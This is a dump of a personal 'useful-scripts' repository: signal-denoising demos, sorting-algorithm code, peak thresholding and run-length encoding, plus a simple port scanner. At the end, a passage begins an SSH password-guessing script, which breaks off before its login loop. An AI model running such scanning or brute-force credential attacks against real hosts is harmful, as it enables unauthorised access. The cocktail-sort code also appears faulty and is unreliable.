40 | ax[1].set_title('filtered signal') 41 | 42 | ax[2].plot(time_vec,noisy_signal - filtered_signal) 43 | ax[2].set_title('noise') 44 | ax[2].set_xlabel('time (s)') 45 | 46 | plt.tight_layout() 47 | plt.show(block=False) 48 | ``` 49 | 50 | ## USING PYWAVELETS TO REMOVE HIGH FREQUENCY NOISE 51 | 52 | > Reference: [here](http://connor-johnson.com/2016/01/24/using-pywavelets-to-remove-high-frequency-noise/) 53 | 54 | ``` 55 | $ sudo pip install PyWavelets 56 | ``` 57 | 58 | The wavelet argument determines the type of wavelet, more wavelet types can be found here. I’ve specified the "db4" wavelet as the default, but the PyWavelets module supports over seventy different types of wavelets. Below is a list of possible wavelet parameters, 59 | 60 | ``` 61 | The Haar wavelet, "haar", produces a square signal 62 | the “Discrete” Meyer wavelet, "dmey" 63 | The Daubechies family of wavelets, "db1" through "db20" 64 | The Symlets family, "sym2" through "sym20" 65 | The Coiflet family, "coif1" through "coif5" 66 | The Biorthognal and Reverse Biorthogonal families 67 | "bior1.1", "rbio1.1" 68 | "bior1.3", "rbio1.3" 69 | "bior1.5", "rbio1.5" 70 | "bior2.2", "rbio2.2" 71 | "bior2.4", "rbio2.4" 72 | "bior2.6", "rbio2.6" 73 | "bior2.8", "rbio2.8" 74 | "bior3.1", "rbio3.1" 75 | "bior3.3", "rbio3.3" 76 | "bior3.5", "rbio3.5" 77 | "bior3.7", "rbio3.7" 78 | "bior3.9", "rbio3.9" 79 | "bior4.4", "rbio4.4" 80 | "bior5.5", "rbio5.5" 81 | "bior6.8", "rbio6.8" 82 | ``` 83 | 84 | The level argument determines the level of smoothing, but it depends on the length of the signal that you are smoothing, so start with 1, and then move up to 2, etc, until you get an error. (Scientific, I know.) 85 | 86 | ```python 87 | %inline pylab # <-- add this if you're in an IPython notebook 88 | import pywt 89 | import numpy as np 90 | import seaborn 91 | from statsmodels.robust import mad 92 | 93 | def waveletSmooth( x, wavelet="db4", level=1, title=None ): 94 | # calculate the wavelet coefficients 95 | coeff = pywt.wavedec( x, wavelet, mode="per" ) 96 | # calculate a threshold 97 | sigma = mad( coeff[-level] ) 98 | # changing this threshold also changes the behavior, 99 | # but I have not played with this very much 100 | uthresh = sigma * np.sqrt( 2*np.log( len( x ) ) ) 101 | coeff[1:] = ( pywt.threshold( i, value=uthresh, mode="soft" ) for i in coeff[1:] ) 102 | # reconstruct the signal using the thresholded coefficients 103 | y = pywt.waverec( coeff, wavelet, mode="per" ) 104 | f, ax = plt.subplots() 105 | plot( x, color="b", alpha=0.5 ) 106 | plot( y, color="b" ) 107 | if title: 108 | ax.set_title(title) 109 | ax.set_xlim((0,len(y))) 110 | ``` -------------------------------------------------------------------------------- /python/noise-reduction/demo_filter_signal.py: -------------------------------------------------------------------------------- 1 | ### Example script showing how to perform a Total-Variation filtering with proxTV 2 | import prox_tv as ptv 3 | import numpy as np 4 | import matplotlib.pyplot as plt 5 | import time 6 | 7 | def _blockysignal(): 8 | """Generates a blocky signal for the demo""" 9 | N = 1000 10 | s = np.zeros((N,1)) 11 | s[int(N/4):int(N/2)] = 1 12 | s[int(N/2):int(3*N/4)] = -1 13 | s[int(3*N/4):int(-N/8)] = 2 14 | return s 15 | 16 | ### TV-L1 filtering 17 | 18 | # Generate impulse (blocky) signal 19 | s = _blockysignal() 20 | 21 | # Introduce noise 22 | n = s + 0.5*np.random.rand(*np.shape(s)) 23 | 24 | # Filter using TV-L1 25 | lam=20 26 | print('Filtering signal with TV-L1...') 27 | start = time.time() 28 | f = ptv.tv1_1d(n,lam) 29 | end = time.time() 30 | print('Elapsed time ' + str(end-start)) 31 | 32 | # Plot results 33 | plt.subplot(3, 1, 1) 34 | plt.title('TVL1 filtering') 35 | plt.plot(s) 36 | plt.ylabel('Original') 37 | plt.grid(True) 38 | 39 | plt.subplot(3, 1, 2) 40 | plt.plot(n) 41 | plt.ylabel('Noisy') 42 | plt.grid(True) 43 | 44 | plt.subplot(3, 1, 3) 45 | plt.plot(f) 46 | plt.ylabel('Filtered') 47 | plt.grid(True) 48 | 49 | plt.show() 50 | 51 | ### TV-L2 filtering 52 | 53 | # Generate sinusoidal signal 54 | N = 1000 55 | s = np.sin(np.arange(1,N+1)/10.0) + np.sin(np.arange(1,N+1)/100.0) 56 | 57 | # Introduce noise 58 | n = s + 0.5*np.random.randn(*np.shape(s)) 59 | 60 | # Filter using TV-L2 61 | lam=100; 62 | print('Filtering signal with TV-L2...') 63 | start = time.time() 64 | f = ptv.tv2_1d(n,lam); 65 | end = time.time() 66 | print('Elapsed time ' + str(end-start)) 67 | 68 | # Plot results 69 | plt.subplot(3, 1, 1) 70 | plt.title('TVL2 filtering') 71 | plt.plot(s) 72 | plt.ylabel('Original') 73 | plt.grid(True) 74 | 75 | plt.subplot(3, 1, 2) 76 | plt.plot(n) 77 | plt.ylabel('Noisy') 78 | plt.grid(True) 79 | 80 | plt.subplot(3, 1, 3) 81 | plt.plot(f) 82 | plt.ylabel('Filtered') 83 | plt.grid(True) 84 | 85 | plt.show() 86 | 87 | ### Weighted TV-L1 filtering 88 | 89 | # Generate impulse (blocky) signal 90 | s = _blockysignal() 91 | 92 | # Introduce noise 93 | n = s + 0.5*np.random.randn(*np.shape(s)) 94 | 95 | # Generate weights 96 | lam = np.linspace(0,2,N-1) 97 | 98 | # Filter using weighted TV-L1 99 | print('Filtering signal with weighted TV-L1...') 100 | start = time.time() 101 | f = ptv.tv1w_1d(n, lam) 102 | end = time.time() 103 | print('Elapsed time ' + str(end-start)) 104 | 105 | # Plot results 106 | plt.subplot(4, 1, 1) 107 | plt.title('Weighted TVL1 filtering') 108 | plt.plot(s) 109 | plt.ylabel('Original') 110 | plt.grid(True) 111 | 112 | plt.subplot(4, 1, 2) 113 | plt.plot(n) 114 | plt.ylabel('Noisy') 115 | plt.grid(True) 116 | 117 | plt.subplot(4, 1, 3) 118 | plt.plot(f) 119 | plt.ylabel('Filtered') 120 | plt.grid(True) 121 | 122 | plt.subplot(4, 1, 4) 123 | plt.fill_between(np.arange(1,N), 0, lam) 124 | plt.ylabel('Weights') 125 | plt.grid(True) 126 | 127 | plt.show() 128 | 129 | -------------------------------------------------------------------------------- /python/portscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #!Developer Osama Mahmood 3 | #!Email : osama.mahmood40@gmail.com 4 | #!Website : http://securitytraning.com 5 | 6 | from socket import * 7 | import os 8 | 9 | if os.name == 'nt': 10 | os.system('cls') 11 | else: 12 | os.system('clear') 13 | 14 | 15 | print "*******************************************" 16 | print "************Simple Port Scanner************" 17 | print "*******************************************" 18 | 19 | if __name__ == '__main__': 20 | targetserver = raw_input('Enter host to scan: ') 21 | targetIP = gethostbyname(targetserver) 22 | print 'Ready to scan :3 ', targetIP 23 | 24 | #scan reserved ports 25 | for i in range(1, 1025): 26 | s = socket(AF_INET, SOCK_STREAM) 27 | 28 | result = s.connect_ex((targetIP, i)) 29 | 30 | if(result == 0) : 31 | print 'Port %d: OPEN' % (i,) 32 | s.close() 33 | 34 | print '***********************************************' 35 | print "Scanning finished" 36 | print '***********************************************' 37 | -------------------------------------------------------------------------------- /python/pySorting/README.md: -------------------------------------------------------------------------------- 1 | # PySorting 2 | 3 | A Python program for different sorting algorithms 4 | 5 | ## Sorting Algorithms: 6 | 7 | ### Insertion Sort 8 | 9 | ![insert-sort](./images/insert-sort.gif) 10 | 11 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Insertion_sort) 12 | 13 | A simple sorting algorithm that builds the final sorted array (or list) one item at a time. It is much less efficient on large lists than more advanced algorithms such as quicksort, heapsort, or merge sort. 14 | 15 | __Properties__ 16 | * Data Structure: Array 17 | * Worst case performance: O(n^2) comparisons, swaps 18 | * Best case performance: O(n) comparisons, O(1) swaps 19 | * Average case performance: O(n^2) comparisons, swaps 20 | * Worst-case space complexity: O(n) total, O(1) auxiliary 21 | 22 | ### Bubble sort 23 | 24 | ![bubble-sort](./images/bubble-sort.gif) 25 | 26 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Bubble_sort) 27 | 28 | A simple sorting algorithm that repeatedly steps through the list to be sorted, compares each pair of adjacent items and swaps them if they are in the wrong order. The pass through the list is repeated until no swaps are needed, which indicates that the list is sorted. 29 | 30 | __Properties__ 31 | * Data Structure: Array 32 | * Worst case performance: O(n^2) 33 | * Best case performance: O(n) 34 | * Average case performance: O(n^2) 35 | * Worst-case space complexity: O(1) auxiliary 36 | 37 | ### Quick sort 38 | 39 | ![quick-sort](./images/Sorting_quicksort.gif) 40 | 41 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Quicksort) 42 | 43 | An efficient sorting algorithm, serving as a systematic method for placing the elements of an array in order. 44 | 45 | __Properties__ 46 | * Worst case performance O(n^2) 47 | * Best case performance O(n log n)(simple partition) or O(n) (three-way partition and equal keys) 48 | * Average case performance O(n log n) 49 | * Worst-case space complexity O(n) auxiliary (naive) O(log n) auxiliary (Sedgewick 1978) 50 | 51 | ### Selection sort 52 | 53 | ![selection-sort](./images/Selection_sort.gif) 54 | 55 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Selection_sort) 56 | 57 | An in-place comparison sort and its simplicity. It divides the input lists into two parts: the sublist of items already sorted, adn the sublist of items remaining to be sorted that occupy the rest of the list. 58 | 59 | __Properties__ 60 | * Data Structure: Array 61 | * Worst case performance: O(n^2) 62 | * Best case performance: O(n^2) 63 | * Average case performance: O(n^2) 64 | * Worst-case space complexity: O(n) total, O(1) auxiliary 65 | 66 | ### Shell sort 67 | 68 | ![shell-sort](./images/Sorting_shellsort.gif) 69 | 70 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Shellsort) 71 | 72 | The method starts by sorting pairs of elements far apart from each other, then progressively reducing the gap between elements to be compared. Starting with far apart elements, it can move ome out-of-place elements into position faster then a simple nearest neighbor exchange. 73 | 74 | __Properties__ 75 | * Data Structure: Array 76 | * Worst case performance: O(n log2 2 n) 77 | * Best case performance: O(n log n) 78 | * Average case performance: depends on gap sequence 79 | * Worst-case space complexity: O(n) total, O(1) auxiliary 80 | 81 | ### Merge sort 82 | 83 | ![merge-sort](./images/Merge-sort.gif) 84 | 85 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Merge_sort) 86 | 87 | A divide and conquer sorting algorithm. Most implementations produce a stable sort, which means that the implementation preserves the input order of equal elements in the sorted output. 88 | 89 | __Properties__ 90 | * Data Structure: Array 91 | * Worst case performance: O(n log n) 92 | * Best case performance: O(n log n) typical, O(n) natural variant 93 | * Average case performance: O(n log n) 94 | * Worst-case space complexity: O(n) total, O(1) auxiliary 95 | 96 | ### Heap sort 97 | 98 | ![heap-sort](./images/Heapsort.gif) 99 | 100 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Heapsort) 101 | 102 | A comparison-based sorting algorithm. It can be thought of as an improved selection sort, it divides its input into s sorted and an unsorted region, and it iteratively shrinks the unsorted region by extracting the largest element and moving that to the sorted region. 103 | 104 | __Properties__ 105 | * Data Structure: Array 106 | * Worst case performance: O(n log n) 107 | * Best case performance: O(n log n) 108 | * Average case performance: O(n log n) 109 | * Worst-case space complexity: O(1) auxiliary 110 | 111 | ### Gnome sort 112 | 113 | ![gnome-sort](./images/Sorting_gnomesort.gif) 114 | 115 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Gnome_sort) 116 | 117 | It is similar to insertion sort, except that moving an element to its proper place is accomplished by a series of swaps, as in bubble sort. 118 | 119 | __Properties__ 120 | * Data Structure: Array 121 | * Worst case performance: O(n^2) 122 | * Best case performance: Ω(n) 123 | * Average case performance: O(n^2) 124 | * Worst-case space complexity: O(1) auxiliary 125 | 126 | ### Cocktail sort 127 | 128 | ![cocktail-sort](./images/Sorting_shaker_sort.gif) 129 | 130 | Image Source:[wikipedia](https://en.wikipedia.org/wiki/Cocktail_shaker_sort) 131 | 132 | Bidirectional bubble sort, a variation of bubble sort, it sorts in both directions on each pass through the list. 133 | 134 | __Properties__ 135 | * Data Structure: Array 136 | * Worst case performance: O(n^2) 137 | * Best case performance: O(n) 138 | * Average case performance: O(n^2) 139 | * Worst-case space complexity: O(1) 140 | 141 | ## How-To 142 | 143 | It is compatible in both Python 2.x and Python 3.x, it runs on the standard in-build library, no external dependencies need. 144 | -------------------------------------------------------------------------------- /python/pySorting/demo.py: -------------------------------------------------------------------------------- 1 | # demo.py 2 | 3 | import sys, time, random 4 | import PySorting 5 | 6 | print("\nUsing this list to check sorting:") 7 | print ("Original list:") 8 | print([1,5,0,6,10,3]) 9 | print ("Insertion sort:") 10 | print(PySorting.insertion_sort([1,5,0,6,10,3])) 11 | print ("Bubble sort:") 12 | print(PySorting.bubble_sort([1,5,0,6,10,3])) 13 | print ("Quick sort:") 14 | print(PySorting.quick_sort([1,5,0,6,10,3])) 15 | print ("Selection sort:") 16 | print(PySorting.selection_sort([1,5,0,6,10,3])) 17 | print ("Shell sort:") 18 | print(PySorting.shell_sort([1,5,0,6,10,3])) 19 | print ("Merge sort:") 20 | print(PySorting.merge_sort([1,5,0,6,10,3])) 21 | print ("Heap sort:") 22 | print(PySorting.heap_sort([1,5,0,6,10,3])) 23 | print ("Gnome sort:") 24 | print(PySorting.gnome_sort([1,5,0,6,10,3])) 25 | print ("Cocktail sort:") 26 | print(PySorting.cocktail_sort([1,5,0,6,10,3])) 27 | 28 | 29 | 30 | 31 | print("\nUsing following method to time sorting:") 32 | 33 | sum = 0.0 34 | print ("Insertion sort:") 35 | for x in range(0,3): 36 | t1 = time.time() 37 | PySorting.insertion_sort([random.randint(0,1001) for x in range(0, 1000)]) 38 | t2 = time.time() 39 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 40 | sum += (t2 - t1)*1000.0 41 | print ("Average time: %0.3f ms\n" % (sum/3)) 42 | 43 | sum = 0.0 44 | print ("Bubble sort:") 45 | for x in range(0,3): 46 | t1 = time.time() 47 | PySorting.bubble_sort([random.randint(0,1001) for x in range(0, 1000)]) 48 | t2 = time.time() 49 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 50 | sum += (t2 - t1)*1000.0 51 | print ("Average time: %0.3f ms\n" % (sum/3)) 52 | 53 | 54 | sum = 0.0 55 | print ("Quick sort:") 56 | for x in range(0,3): 57 | t1 = time.time() 58 | PySorting.quick_sort([random.randint(0,1001) for x in range(0, 1000)]) 59 | t2 = time.time() 60 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 61 | sum += (t2 - t1)*1000.0 62 | print ("Average time: %0.3f ms\n" % (sum/3)) 63 | 64 | 65 | sum = 0.0 66 | print ("Selection sort:") 67 | for x in range(0,3): 68 | t1 = time.time() 69 | PySorting.selection_sort([random.randint(0,1001) for x in range(0, 1000)]) 70 | t2 = time.time() 71 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 72 | sum += (t2 - t1)*1000.0 73 | print ("Average time: %0.3f ms\n" % (sum/3)) 74 | 75 | sum = 0.0 76 | print ("Shell sort:") 77 | for x in range(0,3): 78 | t1 = time.time() 79 | PySorting.shell_sort([random.randint(0,1001) for x in range(0, 1000)]) 80 | t2 = time.time() 81 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 82 | sum += (t2 - t1)*1000.0 83 | print ("Average time: %0.3f ms\n" % (sum/3)) 84 | 85 | sum = 0.0 86 | print ("Heap sort:") 87 | for x in range(0,3): 88 | t1 = time.time() 89 | PySorting.heap_sort([random.randint(0,1001) for x in range(0, 1000)]) 90 | t2 = time.time() 91 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 92 | sum += (t2 - t1)*1000.0 93 | print ("Average time: %0.3f ms\n" % (sum/3)) 94 | 95 | sum = 0.0 96 | print ("Gnome sort:") 97 | for x in range(0,3): 98 | t1 = time.time() 99 | PySorting.gnome_sort([random.randint(0,1001) for x in range(0, 1000)]) 100 | t2 = time.time() 101 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 102 | sum += (t2 - t1)*1000.0 103 | print ("Average time: %0.3f ms\n" % (sum/3)) 104 | 105 | sum = 0.0 106 | print ("Cocktail sort:") 107 | for x in range(0,3): 108 | t1 = time.time() 109 | PySorting.cocktail_sort([random.randint(0,1001) for x in range(0, 1000)]) 110 | t2 = time.time() 111 | print ("%0.3f ms" % ((t2 - t1)*1000.0)) 112 | sum += (t2 - t1)*1000.0 113 | print ("Average time: %0.3f ms\n" % (sum/3)) 114 | 115 | -------------------------------------------------------------------------------- /python/pySorting/images/Heapsort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Heapsort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Merge-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Merge-sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Selection_sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Selection_sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_gnomesort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_gnomesort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_quicksort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_quicksort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_shaker_sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_shaker_sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/Sorting_shellsort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/Sorting_shellsort.gif -------------------------------------------------------------------------------- /python/pySorting/images/bubble-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/bubble-sort.gif -------------------------------------------------------------------------------- /python/pySorting/images/insert-sort.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/pySorting/images/insert-sort.gif -------------------------------------------------------------------------------- /python/pySorting/pySorting.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # PySorting.py - implementation of sort algorithm in Python 3 | 4 | """The implementation of sort algorithm in Python 5 | 6 | :param alist: some mutable unordered alist 7 | :return: the some alist ordered by ascending 8 | 9 | Examples: 10 | >>> insertion_sort([1,5,3,2,0]) 11 | [0,1,2,3,5] 12 | """ 13 | 14 | # concatenate two sorted lists, used in quick sorting 15 | def _concatenate_lists(list_1, middle, list_2): 16 | alist = [] # create a new list 17 | if list_1 is not None: 18 | alist.extend(list_1) 19 | 20 | if middle is not None: 21 | alist.append(middle) # append the middle if there is one 22 | 23 | if list_2 is not None: 24 | alist.extend(list_2) # append each of the elements from list_2 25 | 26 | return alist # return the list 27 | 28 | # used in heap sorting 29 | def _heapify(unsorted, index, heap_size): 30 | greatest = index 31 | left_index = 2 * index + 1 32 | right_index = 2 * index + 2 33 | if left_index < heap_size and unsorted[left_index] > unsorted[greatest]: 34 | greatest = left_index 35 | 36 | if right_index < heap_size and unsorted[right_index] > unsorted[greatest]: 37 | greatest = right_index 38 | 39 | if greatest != index: 40 | tmp = unsorted[greatest] 41 | unsorted[greatest] = unsorted[index] 42 | unsorted[index] = tmp 43 | _heapify(unsorted, greatest, heap_size) 44 | 45 | 46 | 47 | 48 | 49 | def insertion_sort(alist): 50 | 51 | length = len(alist) 52 | for i in range(1,length): 53 | for j in range(i,length): 54 | if alist[j] < alist[i]: 55 | tmp = alist[i] 56 | alist[i] = alist[j] 57 | alist[j] = tmp 58 | # Or using the following loop to replace the j for loop 59 | # while 0 < i and alist[i] < alist[i - 1]: 60 | # alist[i], alist[i - 1] = alist[i - 1], alist[i] 61 | # i -= 1 62 | return alist 63 | 64 | def bubble_sort(alist): 65 | length = len(alist) 66 | for i in range(length-1,0,-1): 67 | for j in range(i): 68 | if alist[j] > alist[j+1]: 69 | tmp = alist[j] 70 | alist[j] = alist[j+1] 71 | alist[j+1] = tmp 72 | return alist 73 | 74 | def quick_sort(alist): 75 | smaller = [] 76 | greater = [] 77 | if len(alist) <= 1: 78 | return alist 79 | pivot = alist.pop() 80 | for i in alist: 81 | if i < pivot: 82 | smaller.append(i) 83 | else: 84 | greater.append(i) 85 | return _concatenate_lists(quick_sort(smaller), pivot, quick_sort(greater)) 86 | 87 | def selection_sort(alist): 88 | length = len(alist) 89 | for i in range(length-1, 0, -1): 90 | pos = 0 91 | for j in range(1, i+1): 92 | if alist[j] > alist[pos]: 93 | pos = j 94 | tmp = alist[i] 95 | alist[i] = alist[pos] 96 | alist[pos] = tmp 97 | return alist 98 | 99 | def shell_sort(alist): 100 | # shell sort using shell's gap sequence: n/2, n/4, ..., 1 101 | length = len(alist) 102 | gap = length // 2 103 | # loop over the gaps 104 | while gap > 0: 105 | # do the insertion sort 106 | for i in range(gap,length): 107 | val = alist[i] 108 | j = i 109 | while j >= gap and alist[j - gap] > val: 110 | alist[j] = alist[j - gap] 111 | j -= gap 112 | alist[j] = val 113 | gap //= 2 114 | return alist 115 | 116 | def merge_sort(alist): 117 | length = len(alist) 118 | if length > 1: 119 | midpoint = length // 2 120 | left_half = merge_sort(alist[:midpoint]) 121 | right_half = merge_sort(alist[midpoint:]) 122 | i = 0 123 | j = 0 124 | k = 0 125 | left_length = len(left_half) 126 | right_length = len(right_half) 127 | while i < left_length and j < right_length: 128 | if left_half[i] < right_half[j]: 129 | alist[k] = left_half[i] 130 | i += 1 131 | else: 132 | alist[k] = right_half[j] 133 | j += 1 134 | k += 1 135 | while i < left_length: 136 | alist[k] = left_half[i] 137 | i += 1 138 | k += 1 139 | while j < right_length: 140 | alist[k] = right_half[j] 141 | j += 1 142 | k += 1 143 | return alist 144 | 145 | def heap_sort(alist): 146 | length = len(alist) 147 | for i in range(length // 2 - 1,-1,-1): 148 | _heapify(alist, i, length) 149 | for i in range(length-1,0,-1): 150 | tmp = alist[0] 151 | alist[0] = alist[i] 152 | alist[i] = tmp 153 | _heapify(alist, 0, i) 154 | return alist 155 | 156 | def gnome_sort(alist): 157 | i = 1 158 | length = len(alist) 159 | while i < length: 160 | if alist[i] >= alist[i-1]: 161 | i += 1 162 | else: 163 | tmp = alist[i] 164 | alist[i] = alist[i-1] 165 | alist[i-1] = tmp 166 | if i > 1: 167 | i -= 1 168 | return alist 169 | 170 | def cocktail_sort(alist): 171 | length = len(alist) 172 | for i in range(length-1,0,-1): 173 | swapped = False 174 | for j in range(i,0,-1): 175 | if alist[j] < alist[j-1]: 176 | tmp = alist[j] 177 | alist[j] = alist[j-1] 178 | alist[j-1] = tmp 179 | swapped = True 180 | for j in range(i): 181 | if alist[j] > alist[i]: 182 | alist[j], alist[j+1] = alist[j+1], alist[j] 183 | swapped = True 184 | if not swapped: 185 | return alist 186 | 187 | -------------------------------------------------------------------------------- /python/run-length-encoding/ThresholdingAlgo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ifding/useful-scripts/cdff33b139b1756883115787a8bfc7e57d653715/python/run-length-encoding/ThresholdingAlgo.gif -------------------------------------------------------------------------------- /python/run-length-encoding/ThresholdingAlgo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Implementation of algorithm from http://stackoverflow.com/a/22640362/6029703 3 | import numpy as np 4 | import pylab 5 | 6 | def thresholding_algo(y, lag, threshold, influence): 7 | signals = np.zeros(len(y)) 8 | filteredY = np.array(y) 9 | avgFilter = [0]*len(y) 10 | stdFilter = [0]*len(y) 11 | avgFilter[lag - 1] = np.mean(y[0:lag]) 12 | stdFilter[lag - 1] = np.std(y[0:lag]) 13 | for i in range(lag, len(y) - 1): 14 | if abs(y[i] - avgFilter[i-1]) > threshold * stdFilter [i-1]: 15 | if y[i] > avgFilter[i-1]: 16 | signals[i] = 1 17 | else: 18 | signals[i] = -1 19 | 20 | filteredY[i] = influence * y[i] + (1 - influence) * filteredY[i-1] 21 | avgFilter[i] = np.mean(filteredY[(i-lag):i]) 22 | stdFilter[i] = np.std(filteredY[(i-lag):i]) 23 | else: 24 | signals[i] = 0 25 | filteredY[i] = y[i] 26 | avgFilter[i] = np.mean(filteredY[(i-lag):i]) 27 | stdFilter[i] = np.std(filteredY[(i-lag):i]) 28 | 29 | return dict(signals = np.asarray(signals), 30 | avgFilter = np.asarray(avgFilter), 31 | stdFilter = np.asarray(stdFilter)) 32 | 33 | 34 | 35 | # Data 36 | y = np.array([1,1,1.1,1,0.9,1,1,1.1,1,0.9,1,1.1,1,1,0.9,1,1,1.1,1,1,1,1,1.1,0.9,1,1.1,1,1,0.9, 37 | 1,1.1,1,1,1.1,1,0.8,0.9,1,1.2,0.9,1,1,1.1,1.2,1,1.5,1,3,2,5,3,2,1,1,1,0.9,1,1,3, 38 | 2.6,4,3,3.2,2,1,1,0.8,4,4,2,2.5,1,1,1]) 39 | 40 | # Settings: lag = 30, threshold = 5, influence = 0 41 | lag = 30 42 | threshold = 5 43 | influence = 0 44 | 45 | # Run algo with settings from above 46 | result = thresholding_algo(y, lag=lag, threshold=threshold, influence=influence) 47 | 48 | # Plot result 49 | pylab.subplot(211) 50 | pylab.plot(np.arange(1, len(y)+1), y) 51 | 52 | pylab.plot(np.arange(1, len(y)+1), 53 | result["avgFilter"], color="cyan", lw=2) 54 | 55 | pylab.plot(np.arange(1, len(y)+1), 56 | result["avgFilter"] + threshold * result["stdFilter"], color="green", lw=2) 57 | 58 | pylab.plot(np.arange(1, len(y)+1), 59 | result["avgFilter"] - threshold * result["stdFilter"], color="green", lw=2) 60 | 61 | pylab.subplot(212) 62 | pylab.step(np.arange(1, len(y)+1), result["signals"], color="red", lw=2) 63 | pylab.ylim(-1.5, 1.5) 64 | 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /python/run-length-encoding/run-length-encoding.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [find length of sequences of identical values in a numpy array](https://stackoverflow.com/questions/1066758/find-length-of-sequences-of-identical-values-in-a-numpy-array-run-length-encodi) 4 | 5 | Fully numpy vectorized and generic RLE for any array (works with strings, booleans etc too). 6 | Outputs tuple of run lengths, start positions, and values. 7 | 8 | ```python 9 | import numpy as np 10 | 11 | def rle(inarray): 12 | """ run length encoding. Partial credit to R rle function. 13 | Multi datatype arrays catered for including non Numpy 14 | returns: tuple (runlengths, startpositions, values) """ 15 | ia = np.array(inarray) # force numpy 16 | n = len(ia) 17 | if n == 0: 18 | return (None, None, None) 19 | else: 20 | y = np.array(ia[1:] != ia[:-1]) # pairwise unequal (string safe) 21 | i = np.append(np.where(y), n - 1) # must include last element posi 22 | z = np.diff(np.append(-1, i)) # run lengths 23 | p = np.cumsum(np.append(0, z))[:-1] # positions 24 | return(z, p, ia[i]) 25 | ``` 26 | 27 | Pretty fast (i7): 28 | ```python 29 | xx = np.random.randint(0, 5, 1000000) 30 | %timeit yy = rle(xx) 31 | 100 loops, best of 3: 18.6 ms per loop 32 | ``` 33 | Multiple data types: 34 | ```python 35 | rle([True, True, True, False, True, False, False]) 36 | Out[8]: 37 | (array([3, 1, 1, 2]), 38 | array([0, 3, 4, 5]), 39 | array([ True, False, True, False], dtype=bool)) 40 | 41 | rle(np.array([5, 4, 4, 4, 4, 0, 0])) 42 | Out[9]: (array([1, 4, 2]), array([0, 1, 5]), array([5, 4, 0])) 43 | 44 | rle(["hello", "hello", "my", "friend", "okay", "okay", "bye"]) 45 | Out[10]: 46 | (array([2, 1, 1, 2, 1]), 47 | array([0, 2, 3, 4, 6]), 48 | array(['hello', 'my', 'friend', 'okay', 'bye'], 49 | dtype='|S6')) 50 | ``` 51 | 52 | Same results as Alex Martelli above: 53 | ```python 54 | xx = np.random.randint(0, 2, 20) 55 | 56 | xx 57 | Out[60]: array([1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1]) 58 | 59 | am = runs_of_ones_array(xx) 60 | 61 | tb = rle(xx) 62 | 63 | am 64 | Out[63]: array([4, 5, 2, 5]) 65 | 66 | tb[0][tb[2] == 1] 67 | Out[64]: array([4, 5, 2, 5]) 68 | 69 | %timeit runs_of_ones_array(xx) 70 | 10000 loops, best of 3: 28.5 µs per loop 71 | 72 | %timeit rle(xx) 73 | 10000 loops, best of 3: 38.2 µs per loop 74 | Slightly slower than Alex (but still very fast), and much more flexible. 75 | ``` 76 | -------------------------------------------------------------------------------- /python/ssh-dictionary-attack.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import sys 3 | import socket 4 | 5 | # Usage 6 | # python3 attack.py [host_name] [login_file] 7 | 8 | # https://github.com/veeral-patel/SSH-Dictionary-Attack 9 | 10 | #It takes the target's host name and a file containing 11 | #usernames and passwords, like this: 12 | 13 | # user1 pass1 14 | # user2 pass2 15 | # user3 pass3 16 | 17 | 18 | if len(sys.argv[1:]) != 2: 19 | print("Exactly 2 arguments required!") 20 | sys.exit() 21 | 22 | # host = "hive22.cs.berkeley.edu" 23 | host = sys.argv[1] 24 | with open(sys.argv[2], 'r') as file: 25 | lines = file.readlines() 26 | 27 | lines = [line.strip("\n") for line in lines] 28 | lst = [tuple(line.split(" ")) for line in lines] 29 | 30 | client = paramiko.SSHClient() 31 | 